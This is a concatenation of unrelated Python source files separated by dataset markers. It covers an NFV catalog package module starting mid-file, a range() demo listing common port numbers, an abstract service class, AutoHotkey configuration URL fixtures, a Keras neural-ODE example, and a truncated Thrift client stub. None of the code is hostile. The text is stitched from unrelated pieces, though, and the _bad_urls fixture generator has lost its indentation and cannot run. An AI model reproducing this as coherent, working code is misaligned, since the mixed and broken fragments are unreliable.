    return [0, payload]
def ns_on_distribute(csar_id):
    """
    Get NS package from SDC and store it locally.
    :param csar_id: SDC service CSAR id
    :return: formatted status response (see fmt_ns_pkg_rsp)
    """
    ret = None
    try:
        ret = NsPackage().on_distribute(csar_id)
    except CatalogException as e:
        NsPackage().delete_csar(csar_id)
        return fmt_ns_pkg_rsp(STATUS_FAILED, e.args[0])
    except Exception:
        # Was a bare `except:`; narrowed so SystemExit/KeyboardInterrupt
        # still propagate.  Any other failure is logged and reported.
        logger.error(traceback.format_exc())
        NsPackage().delete_csar(csar_id)
        return fmt_ns_pkg_rsp(STATUS_FAILED, str(sys.exc_info()))
    if ret[0]:
        return fmt_ns_pkg_rsp(STATUS_FAILED, ret[1])
    return fmt_ns_pkg_rsp(STATUS_SUCCESS, ret[1], "")
def ns_delete_csar(csar_id):
    """
    Delete NS package.
    :param csar_id:
    :return: formatted status response (see fmt_ns_pkg_rsp)
    """
    ret = None
    try:
        ret = NsPackage().delete_csar(csar_id)
    except CatalogException as e:
        return fmt_ns_pkg_rsp(STATUS_FAILED, e.args[0])
    except Exception:
        # Was a bare `except:`; narrowed so SystemExit/KeyboardInterrupt
        # still propagate.
        logger.error(traceback.format_exc())
        return fmt_ns_pkg_rsp(STATUS_FAILED, str(sys.exc_info()))
    return fmt_ns_pkg_rsp(STATUS_SUCCESS, ret[1], "")
def ns_get_csars():
    """
    Get all NS packages.
    :return: [0, csar list] on success, [1, error message] on failure
    """
    ret = None
    try:
        ret = NsPackage().get_csars()
    except CatalogException as e:
        return [1, e.args[0]]
    except Exception:
        # Was a bare `except:`; narrowed so SystemExit/KeyboardInterrupt
        # still propagate.
        logger.error(traceback.format_exc())
        return [1, str(sys.exc_info())]
    return ret
def ns_get_csar(csar_id):
    """
    Get NS package by id.
    :param csar_id:
    :return: [0, package info] on success, [1, error message] on failure
    """
    ret = None
    try:
        ret = NsPackage().get_csar(csar_id)
    except CatalogException as e:
        return [1, e.args[0]]
    except Exception as e:
        # Log str(e) instead of e.args[0]: an exception constructed without
        # arguments would raise IndexError inside this handler.
        logger.error(str(e))
        logger.error(traceback.format_exc())
        return [1, str(sys.exc_info())]
    return ret
def parse_nsd(csar_id, inputs):
    """
    Parse NSD from a locally stored NS package.
    :param csar_id:
    :param inputs: parser input parameters
    :return: [0, {"model": ...}] on success, [1, error message] on failure
    """
    ret = None
    try:
        ns_pkg = NSPackageModel.objects.filter(nsPackageId=csar_id)
        if not ns_pkg:
            raise CatalogException("NS CSAR(%s) does not exist." % csar_id)
        csar_path = ns_pkg[0].localFilePath
        ret = {"model": toscaparser.parse_nsd(csar_path, inputs)}
    except CatalogException as e:
        return [1, e.args[0]]
    except Exception as e:
        # Log str(e) instead of e.args[0]: an exception constructed without
        # arguments would raise IndexError inside this handler.
        logger.error(str(e))
        logger.error(traceback.format_exc())
        return [1, str(sys.exc_info())]
    return [0, ret]
class NsPackage(object):
    """
    Actions for sdc ns package.
    """

    def __init__(self):
        pass

    def on_distribute(self, csar_id):
        """
        Fetch NS package csar from SDC, verify its resources are already
        distributed, download it and persist the descriptor.
        :param csar_id:
        :return: [retcode, message]
        """
        if NSPackageModel.objects.filter(nsPackageId=csar_id):
            return [1, "NS CSAR(%s) already exists." % csar_id]

        ns = sdc.get_asset(sdc.ASSETTYPE_SERVICES, csar_id)
        # check if the related resources exist
        resources = ns.get('resources', None)
        if resources:
            for resource in resources:
                # Bugfix: `.upper` (the bound method object) was compared to
                # 'VF', which is always False, so a missing VF package was
                # never detected.  `.upper()` must be called.
                # NOTE(review): the key spelling 'resoucreType' is assumed to
                # match the SDC payload as-is -- confirm against the SDC API.
                if resource['resoucreType'].upper() == 'VF' and not VnfPackageModel.objects.filter(
                        vnfPackageId=resource['resourceUUID']):
                    logger.error("VF [%s] is not distributed.", resource['resourceUUID'])
                    raise CatalogException("VF (%s) is not distributed." % resource['resourceUUID'])
                # if resource['resoucreType'] == 'PNF' and not PnfPackageModel.objects.filter(
                #     pnfPackageId=resource['resourceUUID']):
                #     logger.error("PNF [%s] is not distributed.", resource['resourceUUID'])
                #     raise CatalogException("PNF (%s) is not distributed." % resource['resourceUUID'])

        # download csar package
        local_path = os.path.join(CATALOG_ROOT_PATH, csar_id)
        csar_name = "%s.csar" % ns.get("name", csar_id)
        local_file_name = sdc.download_artifacts(ns["toscaModelURL"], local_path, csar_name)
        if local_file_name.endswith(".csar") or local_file_name.endswith(".zip"):
            # some packages embed the real NS csar as a deployment artifact
            artifact_vnf_file = fileutil.unzip_file(local_file_name, local_path, "Artifacts/Deployment/OTHER/ns.csar")
            if os.path.exists(artifact_vnf_file):
                local_file_name = artifact_vnf_file

        data = {
            'userDefinedData': {}
        }
        nsd = NsDescriptor()
        nsd.create(data, csar_id)
        nsd.parse_nsd_and_save(csar_id, local_file_name)
        return [0, "CSAR(%s) distributed successfully." % csar_id]

    def delete_csar(self, csar_id):
        """
        Delete NS package by id.
        :param csar_id:
        :return: [retcode, message]
        """
        nsd = NsDescriptor()
        nsd.delete_single(csar_id)
        return [0, "Delete CSAR(%s) successfully." % csar_id]

    def get_csars(self):
        """
        Get all NS packages.
        :return: [0, list of package info dicts]
        """
        csars = []
        nss = NSPackageModel.objects.filter()
        for ns in nss:
            ret = self.get_csar(ns.nsPackageId)
            csars.append(ret[1])
        return [0, csars]

    def get_csar(self, csar_id):
        """
        Get NS package info by id.
        :param csar_id:
        :return: [0, {"csarId": ..., "packageInfo": ...}]
        :raises CatalogException: when the package is unknown
        """
        package_info = {}
        csars = NSPackageModel.objects.filter(nsPackageId=csar_id)
        if csars:
            package_info["nsdId"] = csars[0].nsdId
            package_info["nsPackageId"] = csars[0].nsPackageId
            package_info["nsdProvider"] = csars[0].nsdDesginer
            package_info["nsdVersion"] = csars[0].nsdVersion
            package_info["csarName"] = csars[0].nsPackageUri
            package_info["nsdModel"] = csars[0].nsdModel
            package_info["nsdInvariantId"] = csars[0].invariantId
            # download URL is served through the MSB gateway
            package_info["downloadUrl"] = "http://%s:%s/%s/%s/%s" % (
                REG_TO_MSB_REG_PARAM[0]["nodes"][0]["ip"],
                REG_TO_MSB_REG_PARAM[0]["nodes"][0]["port"],
                CATALOG_URL_PATH,
                csar_id,
                csars[0].nsPackageUri)
        else:
            raise CatalogException("Ns package[%s] not Found." % csar_id)

        return [0, {"csarId": csar_id, "packageInfo": package_info}]
| StarcoderdataPython |
#!/usr/bin/python
# Demo of the built-in range():
# - yields integers from start up to (but excluding) stop, by the given step
# - only integer arguments are accepted (no str or float)
# - arguments may be negative, but a step of 0 raises ValueError
for decade in range(10, 100, 10):
    print(decade)

print("\nAnother Example to loop over a list using range")

port_lists = [21, 22, 23, 25, 53, 80, 443, 3306, 8080, 9002, 27017]
for idx in range(len(port_lists)):
    print(port_lists[idx])
| StarcoderdataPython |
12820113 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @author: x.huang
# @date:17-8-11
from abc import abstractmethod
from libs.util import AbstractBase
class BaseService(AbstractBase):
    """Abstract base class for CRUD-style services.

    Subclasses must implement insert/update/delete; the read methods are
    optional no-op hooks that may be overridden as needed.
    """

    @abstractmethod
    def insert(self, *args, **kwargs):
        """Create a new record; must be overridden."""
        pass

    @abstractmethod
    def update(self, *args, **kwargs):
        """Modify an existing record; must be overridden."""
        pass

    @abstractmethod
    def delete(self, *args, **kwargs):
        """Remove a record; must be overridden."""
        pass

    def get_by_pk(self, pk):
        """Fetch a single record by primary key (no-op by default)."""
        pass

    def get_all(self, *args, **kwargs):
        """Fetch all records (no-op by default)."""
        pass

    def get(self, *args, **kwargs):
        """Fetch records matching the given criteria (no-op by default)."""
        pass
| StarcoderdataPython |
11313960 | <gh_stars>10-100
# Minimal single-mapping query string used as the baseline key fixture:
# CTRL+ALT+i activates (or launches) Chrome.
basic_url = "/?length=1&comment0=test+comment&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skeyValue0=i&Window0=ahk_exe+chrome.exe&Program0=chrome.exe&option0=ActivateOrOpen"
# Baseline hotstring fixture: typing "btw" is replaced with "by the way".
basic_hotstring_url = (
    "/?indexes=0&comment0=&func0=STRING&skeyValue0=btw&input0=by+the+way&option0=Replace"
)
# Real-world example query strings collected from public users; kept verbatim
# (URL-encoded) and used as smoke-test inputs.
public_examples = [
    "/?length=2&comment0=CTRL+++ALT+++M+%3D+main.vi+%28if+open%29&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skeyValue0=m&Code0=%0D%0A+++if+WinExist%28%22Robot+Main.vi%22%29%0D%0A+++%7B%0D%0A++++++WinActivate%3B+Uses+the+last+found+window.%0D%0A+++%7D%0D%0A+++return&option0=Custom&comment1=CTRL+++ALT+++D+%3D+Driver+Station&func1=KEY&skey1%5B%5D=CTRL&skey1%5B%5D=ALT&skeyValue1=d&Window1=ahk_exe+DriverStation.exe&Program1=C%3A%5CProgram+Files+%28x86%29%5CFRC+Driver+Station%5CDriverstation.exe&option1=ActivateOrOpen",
    "/?length=1&comment0=%3B+CTRL+%2B+Shift+%2B+c+%3D+copy+to+next+window&func0=KEY&skeyValue0=%24%5E%2Bc&Code0=%0D%0A++++Loop%2C+1+%3B+increase+this+to+repeat+multiple+times%0D%0A++++%7B%0D%0A++++++Send%2C+%5Ec%0D%0A++++++Sleep%2C+300+%3B+let+Windows+do+its+thing%0D%0A++++++%3B+Because+Excel+copies+cells+with+an+endline%2C+trim+the+clipboard%0D%0A++++++clipboard+%3A%3D+Trim%28clipboard%2C+OmitChars+%3A%3D+%22+%60n%60r%60t%22%29%0D%0A++++++Send%2C+%21%7BTab%7D%0D%0A++++++Sleep%2C+300+%3B+let+Windows+catch+up%0D%0A++++++Send%2C+%5Ea%0D%0A++++++Send%2C+%5Ev%0D%0A++++++Sleep%2C+300+%3B+let+Windows+do+its+thing%0D%0A++++++Send%2C+%7BReturn%7D%0D%0A++++++Send%2C+%21%7BTab%7D%0D%0A++++++Sleep%2C+30+%3B+let+Windows+do+its+thing%0D%0A++++++Send%2C+%7BReturn%7D+%3B+Excel+wants+to+have+it+clearly+indicated+that+the+copy+command+is+finished%0D%0A++++++Send%2C+%7BDown%7D%0D%0A++++%7D%0D%0A++++return&option0=Custom",
    "/?length=1&comment0=&func0=KEY&skeyValue0=F3&Code0=%0D%0A+next+%3D+GetNextProgram%28%29%0D%0A+get_exe_name+%3D++GetExe%28next%29%3B%0D%0A+MsgBox%2C+Next+Program%3A+%25next%25%60nExe%3A+%25get_exe_name%25%0D%0A+ActivateOrOpen%28next%2C+get_exe_name%29%3B%0D%0A+return%0D%0A%0D%0AGetNextProgram%28%29+%7B%0D%0A+if+WinActive%28%22ahk_class+excel.exe%22%29+%7B+return+%22ahk_exe+outloo.exe%22%7D%0D%0A+if+WinActive%28%22ahk_exe+sage%22%29+%7Breturn+%22ahk_class+MozillaWindowClass%22%7D%0D%0A%7D%0D%0A%0D%0AGetExe%28program%29+%7B%0D%0A+if+%28program+%3D+%22ahk_exe+excel.exe%22%29+%7B+return+%22excel.exe%22%7D%0D%0A+if+%28porgram+%3D+%22ahk_exe+outlook.exe%22%29+%7Breturn+%22outlook.exe%22%7D%0D%0A+if+%28program+%3D+%22ahk_class+MozillaWindowClass%22%29+%7B+return+%22Mozilla.exe%22%7D%3B%0D%0A%7D%0D%0A%0D%0A+%0D%0A+&option0=Custom",
    "/?length=1&comment0=&func0=KEY&skeyValue0=LButton&input0=12345rt&option0=Send",
    "/?length=1&comment0=&func0=KEY&skeyValue0=SC002&Code0=%0D%0A+++++Loop%2C+%3B+loop+forever%0D%0A+++++++++Send%2C+d%0D%0A+++++++++Sleep%2C+7000+%3B+7%2C000+ms+%3D+7+s%0D%0A+++++++++MouseMove%2C+0%2C70%2C%2CR+%3B+move+the+mouse+70+pixels+relative+to+current+position%0D%0A+++++++++Click%0D%0A+++++++++Send%2C+d%0D%0A+++++++++MouseMove%2C+0%2C-70%2C%2CR+%3B+move+the+mouse+70+pixels+relative+to+current+position&option0=Custom",
    "/?length=1&comment0=&func0=KEY&skey0[]=ALT&skeyValue0=F12&input0=%E2%98%BA%E2%99%A5%E2%98%BA&option0=Send",
    "/?length=6&comment0=&func0=KEY&skeyValue0=1&input0=%E2%9A%80&option0=Replace&comment1=&func1=KEY&skeyValue1=2&input1=%E2%9A%81&option1=Replace&comment2=&func2=KEY&skeyValue2=3&input2=%E2%9A%82&option2=Replace&comment3=&func3=KEY&skeyValue3=4&input3=%E2%9A%83&option3=Replace&comment4=&func4=KEY&skeyValue4=5&input4=%E2%9A%84&option4=Replace&comment5=&func5=KEY&skeyValue5=6&input5=%E2%9A%85&option5=Replace",
    "/?length=1&comment0=focus+gimp&func0=KEY&skey0[]=CTRL&skey0[]=ALT&skeyValue0=g&Window0=ahk_exe+gimp.exe&Program0=gimp.exe&option0=ActivateOrOpen",
    "/?length=2&comment0=&func0=KEY&skeyValue0=LButton&input0=k&option0=Send&comment1=&func1=KEY&skeyValue1=RButton&input1=l&option1=Send",
    "/?length=1&comment0=&func0=KEY&skey0[]=ALT&skeyValue0=F12&input0=gds&option0=Send",
    "/?length=1&comment0=&func0=KEY&skey0[]=CTRL&skey0[]=ALT&skeyValue0=t&Window0=Windows+Terminal&Program0=wt&option0=ActivateOrOpen",
    "/?length=1&comment0=&func0=KEY&skey0[]=CTRL&skey0[]=SHIFT&skeyValue0=q&input0=testing!&option0=Send",
    "/?length=1&comment0=&func0=KEY&skeyValue0=MButton&Code0=Send+{PgDn}&option0=Custom",
    "/?length=1&comment0=&func0=STRING&skeyValue0=+fs&input0=^s&option0=Send",
    "/?length=1&comment0=&func0=STRING&skeyValue0=afaik&input0=As+far+as+I+Know&option0=Send",
    "/?length=1&comment0=CTRL+++ALT+++M+=+calendar&func0=KEY&skey0[]=CTRL&skey0[]=ALT&skey0[]=WIN&skeyValue0=q&Window0=Red+Hat+-+Calendar&Program0=https://calendar.google.com/calendar/r/week&option0=ActivateOrOpenChrome",
    "/?length=1&comment0=CTRL+ALT+WIN+W%3DGmail&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skey0%5B%5D=WIN&skeyValue0=w&Window0=Inbox&Program0=https%3A%2F%2Fmail.google.com%2Fmail%2Fu%2F0%2F%23inbox&option0=ActivateOrOpenChrome#inbox&option2=ActivateOrOpenChrome",
]
# Named fixtures: scenario description -> query string.  The key encodes the
# trigger and expected action (e.g. "btw__by_the_way" = hotstring expansion).
basic_test_cases = {
    "base": "/",
    "btw__by_the_way": "/?length=1&comment0=&func0=STRING&skeyValue0=btw&input0=by+the+way&option0=Replace",
    "btw__by_the_way_commented": "/?length=1&comment0=btw+%3D+by+the+way&func0=STRING&skeyValue0=btw&input0=by+the+way&option0=Replace",
    "ctrl_alt_i__chrome": "/?length=1&comment0=&func0=KEY&skey0%5B%5D=CTRL&skey0%5B%5D=ALT&skeyValue0=i&Window0=ahk_exe+chrome.exe&Program0=chrome.exe&option0=ActivateOrOpen",
    "implies__send_unicode_char": "/?length=1&comment1=%22%3Bimplies%22+is+replaced+with+an+arrow&func1=STRING&skeyValue1=%3Bimplies&input1=0x2192&option1=SendUnicodeChar",
    "config__open_config": "/?length=1&comment0=%3Bconfig+%3D+open+this+page&func0=STRING&skeyValue0=%60%3Bconfig&option0=OpenConfig",
    "LButton__send_input": "/?length=1&comment0=&func0=KEY&skeyValue0=LButton&input0=b&option0=Send",
    "pandora__activate_or_open_chrome__pandora_com": "/?length=1&comment0=&func0=STRING&skeyValue0=%60%3Bpandora&Window0=pandora&Program0=http%3A%2F%2Fwww.pandora.com&option0=ActivateOrOpenChrome",
    "ctrl_shift_g__custom_code__google_selected_text": "/?length=1&comment17=CTRL+%2B+Shift+%2B+g+%3D+search+Google+for+the+highlighted+text&func17=KEY&skey17%5B%5D=CTRL&skey17%5B%5D=SHIFT&skeyValue17=g&Code17=%0D%0ASend%2C+%5Ec%0D%0ASleep+50%0D%0ARun%2C+http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3D%25clipboard%25%0D%0AReturn&option17=Custom",
}
def _bad_urls():
leading_parts = [["length=1",], ["indexes={index}"]]
possible_triggers = [
["func{index}=KEY", "skeyValue{index}=d",],
["func{index}=KEY", "skeyValue{index}=g",],
["func{index}=STRING", "skeyValue{index}=btw",],
]
possible_actions = [
["input{index}=by+the+way", "option{index}=Replace",],
[
"Window{index}=ahk_exe+chrome.exe",
"Program{index}=chrome.exe",
"option{index}=ActivateOrOpen",
],
["input{index}=0x2192", "option{index}=SendUnicodeChar",],
["option{index}=OpenConfig",],
["input{index}=b", "option{index}=Send",],
[
"Window{index}=pandora",
"Program{index}=http%3A%2F%2Fwww.pandora.com",
"option{index}=ActivateOrOpenChrome",
],
[
"Code{index}=%0D%0ASend%2C+%5Ec%0D%0ASleep+50%0D%0ARun%2C+http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3D%25clipboard%25%0D%0AReturn",
"option{index}=Custom",
],
]
# missing length
for trigger in possible_triggers:
yield "&".join(trigger + possible_actions[0]).format(index=1)
for leading_part in leading_parts:
for trigger in possible_triggers:
for part in trigger:
other_parts = [t for t in trigger if t != part]
yield "&".join(leading_part + other_parts + possible_actions[0]).format(index=1)
# Prefix each query string with '?' so entries are directly appendable to a URL.
# (Dropped the redundant list() wrapper around the comprehension.)
bad_urls = ["?" + url for url in _bad_urls()]
| StarcoderdataPython |
4800403 | <gh_stars>1-10
import dash_bootstrap_components as dbc
import dash_html_components as html
from components.home_project_block import project_block
from db import session
from models import Project
def layout(*args, **kwargs):
    """Render the landing page: logo jumbotron, headings, and one block per
    screening project (projects are read from the DB, ordered by name)."""
    all_projects = session.query(Project).order_by(Project.name).all()
    projects_row = dbc.Row(
        className='mt-5',
        children=[dbc.Col(width=12, children=html.H3("Screening Projects", className='mt-5 mb-3'))]
        + [project_block(p) for p in all_projects],
    )
    return html.Div([
        dbc.Jumbotron(html.Img(src="assets/logo_2tone.svg"), className="d-flex justify-content-center"),
        html.H1("Genomics of Drug Sensitivity in Cancer", className='display-4 text-center'),
        html.P("Drug Combination Matrix Explorer", className="lead text-center"),
        html.P("An interactive tool for the interpretation of bitherapy data generated at the Wellcome Sanger Institute.", className='text-center post-lead'),
        projects_row,
    ])
| StarcoderdataPython |
5187404 | <gh_stars>1-10
import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.layers import Dense
from matplotlib import pyplot as plt
class Module(keras.Model):
    """Two-layer tanh network used as the right-hand side f(t, x) of an ODE.

    ``call([t, x])`` returns ``dense_2(dense_1(x)) - 0.25 * x``; the time
    input ``t`` is accepted for the solver interface but the network itself
    does not use it.
    """

    def __init__(self, nf):
        super(Module, self).__init__()
        self.dense_1 = Dense(nf, activation='tanh')
        self.dense_2 = Dense(nf, activation='tanh')

    def call(self, inputs, **kwargs):
        _time, state = inputs
        hidden = self.dense_1(state)
        # Linear damping term keeps trajectories from blowing up.
        return self.dense_2(hidden) - 0.25 * state
def odeint(func, y0, t, solver):
    """Integrate an ODE over the time grid ``t`` with a one-step solver.

    Parameters
    ----------
    func : callable
        Right-hand side; called by ``solver`` as ``func([t_k, y_k])``.
    y0 : initial state at ``t[0]``.
    t : array-like supporting elementwise subtraction (e.g. numpy array);
        the integration grid.
    solver : callable(dt, t_k, y_k, func) -> y_{k+1}
        Single-step integrator.

    Returns
    -------
    list of (t_k, y_k) pairs, one per grid point, starting with (t[0], y0).
    """
    tk = t[0]
    yk = y0
    hist = [(tk, y0)]
    # The original printed a carriage-return progress line here; stray
    # debug output has been removed from this library routine.
    for dt in t[1:] - t[:-1]:
        yk = solver(dt, tk, yk, func)
        tk = tk + dt
        hist.append((tk, yk))
    return hist
def midpoint_step_keras(dt, tk, hk, fun):
    """Advance state ``hk`` from time ``tk`` by one step of size ``dt``.

    Averages the slope at the current point with the slope at a full Euler
    step — i.e. Heun's method / the explicit trapezoidal rule (despite the
    "midpoint" in the name, no half-step evaluation is performed).
    """
    slope_start = fun([tk, hk])
    slope_end = fun([tk + dt, hk + dt * slope_start])
    return hk + dt * (slope_start + slope_end) / 2
# def figure_attention(attention):
# fig, ax = tfp.subplots(figsize=(4, 3))
# im = ax.imshow(attention, cmap='jet')
# fig.colorbar(im)
# return fig
if __name__ == '__main__':
    # TF1-era script: switch on eager execution so tensors support .numpy().
    tf.enable_eager_execution()

    t_grid = np.linspace(0, 500., 2000)
    h0 = tf.to_float([[1., -1.]])

    model = Module(2)
    hist = odeint(model, h0, t_grid, midpoint_step_keras)

    # With eager execution enabled, tensors convert directly via .numpy();
    # the tf.Session() the original opened (and never used) on every
    # iteration has been removed.
    results = np.array([h[1].numpy()[0] for h in hist])

    # Plot both state components over the trajectory.
    plt.plot(results.T[0, :])
    plt.plot(results.T[1, :])
    plt.show()
    exit(0)
9689793 | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from cyclozzo.thrift.Thrift import *
from ttypes import *
from cyclozzo.thrift.Thrift import TProcessor
from cyclozzo.thrift.transport import TTransport
from cyclozzo.thrift.protocol import TBinaryProtocol, TProtocol
# Optional C-accelerated (de)serializer; fall back to pure Python when the
# extension is not built. Only ImportError is expected here — the original
# bare `except:` would also have hidden unrelated failures (even SystemExit).
try:
    from cyclozzo.thrift.protocol import fastbinary
except ImportError:
    fastbinary = None
class Iface:
    """
    The client service mimics the C++ client API, with table, scanner and
    mutator interface flattened.

    NOTE: Thrift-generated code (see file header). Every method here is a
    stub (`pass`); the wire implementation is supplied by the generated
    Client class, which subclasses this interface.
    """
    def create_namespace(self, ns):
        """
        Create a namespace
        @param ns - namespace name
        Parameters:
        - ns
        """
        pass
    def create_table(self, ns, table_name, schema):
        """
        Create a table
        @param ns - namespace id
        @param table_name - table name
        @param schema - schema of the table (in xml)
        Parameters:
        - ns
        - table_name
        - schema
        """
        pass
    def open_namespace(self, ns):
        """
        Open a namespace
        @param ns - namespace
        @return value is guaranteed to be non-zero and unique
        Parameters:
        - ns
        """
        pass
    def close_namespace(self, ns):
        """
        Close a namespace
        @param ns - namespace
        Parameters:
        - ns
        """
        pass
    def open_scanner(self, ns, table_name, scan_spec, retry_table_not_found):
        """
        Open a table scanner
        @param ns - namespace id
        @param table_name - table name
        @param scan_spec - scan specification
        @param retry_table_not_found - whether to retry upon errors caused by
        drop/create tables with the same name
        Parameters:
        - ns
        - table_name
        - scan_spec
        - retry_table_not_found
        """
        pass
    def close_scanner(self, scanner):
        """
        Close a table scanner
        @param scanner - scanner id to close
        Parameters:
        - scanner
        """
        pass
    def next_cells(self, scanner):
        """
        Iterate over cells of a scanner
        @param scanner - scanner id
        Parameters:
        - scanner
        """
        pass
    def next_cells_as_arrays(self, scanner):
        """
        Alternative interface using array as cell
        Parameters:
        - scanner
        """
        pass
    def next_cells_serialized(self, scanner):
        """
        Alternative interface returning buffer of serialized cells
        Parameters:
        - scanner
        """
        pass
    def next_row(self, scanner):
        """
        Iterate over rows of a scanner
        @param scanner - scanner id
        Parameters:
        - scanner
        """
        pass
    def next_row_as_arrays(self, scanner):
        """
        Alternative interface using array as cell
        Parameters:
        - scanner
        """
        pass
    def next_row_serialized(self, scanner):
        """
        Alternate interface returning a buffer of serialized cells for iterating by row
        for a given scanner
        @param scanner - scanner id
        Parameters:
        - scanner
        """
        pass
    def get_row(self, ns, table_name, row):
        """
        Get a row (convenience method for random access a row)
        @param ns - namespace id
        @param table_name - table name
        @param row - row key
        @return a list of cells (with row_keys unset)
        Parameters:
        - ns
        - table_name
        - row
        """
        pass
    def get_row_as_arrays(self, ns, name, row):
        """
        Alternative interface using array as cell
        Parameters:
        - ns
        - name
        - row
        """
        pass
    def get_row_serialized(self, ns, table_name, row):
        """
        Alternative interface returning buffer of serialized cells
        Parameters:
        - ns
        - table_name
        - row
        """
        pass
    def get_cell(self, ns, table_name, row, column):
        """
        Get a cell (convenience method for random access a cell)
        @param ns - namespace id
        @param table_name - table name
        @param row - row key
        @param column - column name
        @return value (byte sequence)
        Parameters:
        - ns
        - table_name
        - row
        - column
        """
        pass
    def get_cells(self, ns, table_name, scan_spec):
        """
        Get cells (convenience method for access small amount of cells)
        @param ns - namespace id
        @param table_name - table name
        @param scan_spec - scan specification
        @return a list of cells (a cell with no row key set is assumed to have
        the same row key as the previous cell)
        Parameters:
        - ns
        - table_name
        - scan_spec
        """
        pass
    def get_cells_as_arrays(self, ns, name, scan_spec):
        """
        Alternative interface using array as cell
        Parameters:
        - ns
        - name
        - scan_spec
        """
        pass
    def get_cells_serialized(self, ns, name, scan_spec):
        """
        Alternative interface returning buffer of serialized cells
        Parameters:
        - ns
        - name
        - scan_spec
        """
        pass
    def refresh_shared_mutator(self, ns, table_name, mutate_spec):
        """
        Create a shared mutator with specified MutateSpec.
        Delete and recreate it if the mutator exists.
        @param ns - namespace id
        @param table_name - table name
        @param mutate_spec - mutator specification
        Parameters:
        - ns
        - table_name
        - mutate_spec
        """
        pass
    def offer_cells(self, ns, table_name, mutate_spec, cells):
        """
        Open a shared periodic mutator which causes cells to be written asyncronously.
        Users beware: calling this method merely writes
        cells to a local buffer and does not guarantee that the cells have been persisted.
        If you want guaranteed durability, use the open_mutator+set_cells* interface instead.
        @param ns - namespace id
        @param table_name - table name
        @param mutate_spec - mutator specification
        @param cells - set of cells to be written
        Parameters:
        - ns
        - table_name
        - mutate_spec
        - cells
        """
        pass
    def offer_cells_as_arrays(self, ns, table_name, mutate_spec, cells):
        """
        Alternative to offer_cell interface using array as cell
        Parameters:
        - ns
        - table_name
        - mutate_spec
        - cells
        """
        pass
    def offer_cell(self, ns, table_name, mutate_spec, cell):
        """
        Open a shared periodic mutator which causes cells to be written asyncronously.
        Users beware: calling this method merely writes
        cells to a local buffer and does not guarantee that the cells have been persisted.
        If you want guaranteed durability, use the open_mutator+set_cells* interface instead.
        @param ns - namespace id
        @param table_name - table name
        @param mutate_spec - mutator specification
        @param cell - cell to be written
        Parameters:
        - ns
        - table_name
        - mutate_spec
        - cell
        """
        pass
    def offer_cell_as_array(self, ns, table_name, mutate_spec, cell):
        """
        Alternative to offer_cell interface using array as cell
        Parameters:
        - ns
        - table_name
        - mutate_spec
        - cell
        """
        pass
    def open_mutator(self, ns, table_name, flags, flush_interval):
        """
        Open a table mutator
        @param ns - namespace id
        @param table_name - table name
        @param flags - mutator flags
        @param flush_interval - auto-flush interval in milliseconds; 0 disables it.
        @return mutator id
        Parameters:
        - ns
        - table_name
        - flags
        - flush_interval
        """
        pass
    def close_mutator(self, mutator, flush):
        """
        Close a table mutator
        @param mutator - mutator id to close
        Parameters:
        - mutator
        - flush
        """
        pass
    def set_cell(self, mutator, cell):
        """
        Set a cell in the table
        @param mutator - mutator id
        @param cell - the cell to set
        Parameters:
        - mutator
        - cell
        """
        pass
    def set_cell_as_array(self, mutator, cell):
        """
        Alternative interface using array as cell
        Parameters:
        - mutator
        - cell
        """
        pass
    def set_cells(self, mutator, cells):
        """
        Put a list of cells into a table
        @param mutator - mutator id
        @param cells - a list of cells (a cell with no row key set is assumed
        to have the same row key as the previous cell)
        Parameters:
        - mutator
        - cells
        """
        pass
    def set_cells_as_arrays(self, mutator, cells):
        """
        Alternative interface using array as cell
        Parameters:
        - mutator
        - cells
        """
        pass
    def set_cells_serialized(self, mutator, cells, flush):
        """
        Alternative interface using buffer of serialized cells
        Parameters:
        - mutator
        - cells
        - flush
        """
        pass
    def flush_mutator(self, mutator):
        """
        Flush mutator buffers
        Parameters:
        - mutator
        """
        pass
    def exists_namespace(self, ns):
        """
        Check if the namespace exists
        @param ns - namespace name
        @return true if ns exists, false ow
        Parameters:
        - ns
        """
        pass
    def exists_table(self, ns, name):
        """
        Check if the table exists
        @param ns - namespace id
        @param name - table name
        @return true if table exists, false ow
        Parameters:
        - ns
        - name
        """
        pass
    def get_table_id(self, ns, table_name):
        """
        Get the id of a table
        @param ns - namespace id
        @param table_name - table name
        @return table id string
        Parameters:
        - ns
        - table_name
        """
        pass
    def get_schema_str(self, ns, table_name):
        """
        Get the schema of a table as a string (that can be used with create_table)
        @param ns - namespace id
        @param table_name - table name
        @return schema string (in xml)
        Parameters:
        - ns
        - table_name
        """
        pass
    def get_schema(self, ns, table_name):
        """
        Get the schema of a table as a string (that can be used with create_table)
        @param ns - namespace id
        @param table_name - table name
        @return schema object describing a table
        Parameters:
        - ns
        - table_name
        """
        pass
    def get_tables(self, ns):
        """
        Get a list of table names in the namespace
        @param ns - namespace id
        @return a list of table names
        Parameters:
        - ns
        """
        pass
    def get_listing(self, ns):
        """
        Get a list of namespaces and table names in the namespace
        @param ns - namespace
        @return a list of table names
        Parameters:
        - ns
        """
        pass
    def get_table_splits(self, ns, table_name):
        """
        Get a list of table splits
        @param ns - namespace id
        @param table_name - table name
        @return a list of table names
        Parameters:
        - ns
        - table_name
        """
        pass
    def drop_namespace(self, ns, if_exists):
        """
        Drop a namespace
        @param ns - namespace name
        @param if_exists - if true, don't barf if the table doesn't exist
        Parameters:
        - ns
        - if_exists
        """
        pass
    def rename_table(self, ns, name, new_name):
        """
        Rename a table
        @param ns - namespace id
        @param name - current table name
        @param new_name - new table name
        Parameters:
        - ns
        - name
        - new_name
        """
        pass
    def drop_table(self, ns, name, if_exists):
        """
        Drop a table
        @param ns - namespace id
        @param name - table name
        @param if_exists - if true, don't barf if the table doesn't exist
        Parameters:
        - ns
        - name
        - if_exists
        """
        pass
class Client(Iface):
"""
The client service mimics the C++ client API, with table, scanner and
mutator interface flattened.
"""
def __init__(self, iprot, oprot=None):
self._iprot = self._oprot = iprot
if oprot != None:
self._oprot = oprot
self._seqid = 0
def create_namespace(self, ns):
"""
Create a namespace
@param ns - namespace name
Parameters:
- ns
"""
self.send_create_namespace(ns)
